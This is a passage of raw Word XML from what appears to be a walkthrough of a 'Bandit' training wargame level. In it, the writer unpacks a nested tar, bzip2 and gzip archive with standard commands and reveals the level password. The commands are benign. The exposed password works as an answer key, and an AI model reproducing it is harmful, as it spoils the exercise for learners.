      <w:r w:rsidRPr="00A44469">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F01131" w14:textId="6482BA50" w:rsidR="009D0635" w:rsidRDefault="009D0635" w:rsidP="009D063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5B8402D3" w14:textId="6FEFDCA5" w:rsidR="00253A22" w:rsidRDefault="00253A22" w:rsidP="00253A2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t xml:space="preserve">I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>file data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data: POSIX tar archive (GNU)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0632877A" w14:textId="28FCFFE6" w:rsidR="00253A22" w:rsidRDefault="00253A22" w:rsidP="00253A2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t xml:space="preserve">I decompress the file using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>tar -x -f data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got output file named: </w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data5.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF1DEF8" w14:textId="36037D5A" w:rsidR="003D731E" w:rsidRDefault="003D731E" w:rsidP="00253A2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32BEF5EA" w14:textId="376FDF33" w:rsidR="003D731E" w:rsidRDefault="003D731E" w:rsidP="003D731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t xml:space="preserve">I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>data5.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003D731E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data5.bin: POSIX tar archive (GNU)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ECF1C4" w14:textId="1599F93D" w:rsidR="003D731E" w:rsidRDefault="003D731E" w:rsidP="003D731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t xml:space="preserve">I decompress the file using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">tar -x -f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>data5.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got output file named: </w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECB472" w14:textId="205CACB4" w:rsidR="003D731E" w:rsidRDefault="003D731E" w:rsidP="00253A2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0617C4B8" w14:textId="44B28072" w:rsidR="003D731E" w:rsidRDefault="003D731E" w:rsidP="003D731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t xml:space="preserve">I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>data6.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003D731E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data6.bin: bzip2 compressed data, block size = 900k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE7C9DF" w14:textId="7857919F" w:rsidR="001A2089" w:rsidRDefault="001A2089" w:rsidP="001A2089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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">I decompress the file using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0667">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">bzip2 -d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>data6.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got output file named: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0667">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.bin</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0667">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.ou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. I changed the name to data by using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1506">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mv data6.bin.out data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A7DE4" w14:textId="5C3BB3E4" w:rsidR="00DC1506" w:rsidRDefault="00DC1506" w:rsidP="001A2089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</w:p>
    <w:p w14:paraId="1A50798F" w14:textId="77777777" w:rsidR="00886E85" w:rsidRDefault="00886E85" w:rsidP="00886E8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t xml:space="preserve">I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>file data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data: POSIX tar archive (GNU)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5413CE" w14:textId="6A2306D8" w:rsidR="00886E85" w:rsidRDefault="00886E85" w:rsidP="00886E8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t xml:space="preserve">I decompress the file using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00253A22">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>tar -x -f data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got output file named: </w:t>
      </w:r>
      <w:r w:rsidRPr="00886E85">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data8.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA7E0F" w14:textId="4422446B" w:rsidR="00886E85" w:rsidRDefault="00886E85" w:rsidP="00886E8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35C5F382" w14:textId="19FF137E" w:rsidR="00AE77F3" w:rsidRDefault="00AE77F3" w:rsidP="00AE77F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t xml:space="preserve">I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>file data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>8.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE77F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data8.bin: gzip compressed data, was "data9.bin", last modified: Tue Oct 16 12:00:23 2018, max compression, from Unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3414A906" w14:textId="25C11005" w:rsidR="00AE77F3" w:rsidRDefault="00AE77F3" w:rsidP="00AE77F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t xml:space="preserve">I change the file extension to gzip using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mv data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then I decompress it using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>gzip -d data</w:t>
      </w:r>
      <w:r w:rsidR="00230415">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Output file name is: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44469">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="0035189D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A37B4" w14:textId="5158BF3F" w:rsidR="003D731E" w:rsidRDefault="003D731E" w:rsidP="00253A2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280AF1EE" w14:textId="2D07DF63" w:rsidR="004763F3" w:rsidRDefault="004763F3" w:rsidP="004763F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t xml:space="preserve">I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>file data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004763F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data8: ASCII text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2211B61A" w14:textId="14075A65" w:rsidR="004763F3" w:rsidRDefault="004763F3" w:rsidP="004763F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t xml:space="preserve">For displaying the password, I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="004763F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat data8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got the output: </w:t>
      </w:r>
      <w:r w:rsidR="001E72B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001E72B7" w:rsidRPr="001E72B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The password is </w:t>
      </w:r>
      <w:r w:rsidR="001E72B7" w:rsidRPr="001E72B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL</w:t>
      </w:r>
      <w:r w:rsidR="001E72B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7923A2FD" w14:textId="6730BCFE" w:rsidR="005F6125" w:rsidRDefault="005F6125" w:rsidP="004763F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53CF4A7E" w14:textId="2FF1DF2D" w:rsidR="005F6125" w:rsidRDefault="005F6125" w:rsidP="004763F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5F6125">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13501FFC" w14:textId="703F2AAC" w:rsidR="00787DE5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First, for displaying folder’s files, I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
